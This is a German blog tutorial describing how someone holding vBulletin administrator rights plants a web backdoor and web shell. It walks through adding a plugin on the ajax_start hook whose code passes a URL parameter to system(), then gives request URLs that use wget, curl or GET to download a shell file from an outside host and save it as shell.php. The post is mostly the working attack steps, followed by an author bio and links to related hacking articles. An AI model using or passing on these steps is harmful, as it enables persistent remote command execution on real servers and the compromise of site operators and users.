vBulletin Forum Shell Injection

Veröffentlicht von ¥akuza112am 16. Januar 2019in : TutorialsTags: admin, admincp, injection, Shell, Sql, VbulletinKeine Kommentare

In folgendem Beitrag geht es darum, wie man, wenn man bereits Administrationsrechte hat, vollen oder erweiterten Zugriff, je nach getroffenen Sicherheitsmaßnahmen, bekommt.

Im Administrationspanel von vBulletin musst du via
Plugins -> Plugin Manager -> ein neues Plugin hinzufügen

Produkt

vBulletin

Hook Location

ajax_start

Titel

DEFAULT_PLUG

Execution Order

Plugin PHP Code

system($_GET['cmd']);

Plugin Aktiv

Yes

Öffne nun folgende URL: http://example.org/forum/ajax.php?cmd=

Du hast nun drei Optionen die Shell auf den Server zu laden:

1) WGET
2) CURL
3) GET

Für WGET, benutze folgenden Request:

http://example.org/forum/ajax.php?cmd=wget http://example.org/shell.txt shell.txt shell.php

Für CURL:

http://example.org/forum/ajax.php?cmd=curl http://example.org/shell.txt > shell.php

Für GET:

http://example.org/forum/ajax.php?cmd=get http://example.org/shell.txt shell.php

Anschließend kannst du die Shell via http://example.org/forum/shell.php aufrufen.

¥akuza112

Ich beschäftige mich größtenteils mit aktuellen Nachrichten bzgl. Hacking, Cracking & Security, sowie Globalen und Scene News. Wir haben uns nicht unterkriegen lassen und sind trotz vieler Drohungen, Ddos Attacken usw. seit August 2010 online. Die Privatsphäre unserer Leser liegt uns sehr am Herzen, weswegen wir keinerlei Nutzerdaten (in Form von IP Adressen) unserer Nutzer in der Datenbank speichern. Falls Sie Fragen, Anregungen oder Kritik haben, schicken Sie mir doch einfach eine Nachricht. Weitere Kontaktmöglichkeiten finden Sie auf yakuza112.org.

Einfacher Webseitenschutz gegen Scanprogramme von Angreifern

Zabbix Monitoring

Über den Autor

¥akuza112

Ähnliche Artikel

Hinterlasse eine Antwort Breche Antwort ab

vBulletin Forum Shell Injection

Einfacher Webseitenschutz gegen Scanprogramme von Angreifern

Zabbix Monitoring

Über den Autor

¥akuza112

Ähnliche Artikel

UDP Flooding mit hoher Bandbreite

vBulletin 3.X/4.X CSRF IMG-Tag Exploit Fix v3

[Eng] How to upload shell thinking differently

Hinterlasse eine Antwort Breche Antwort ab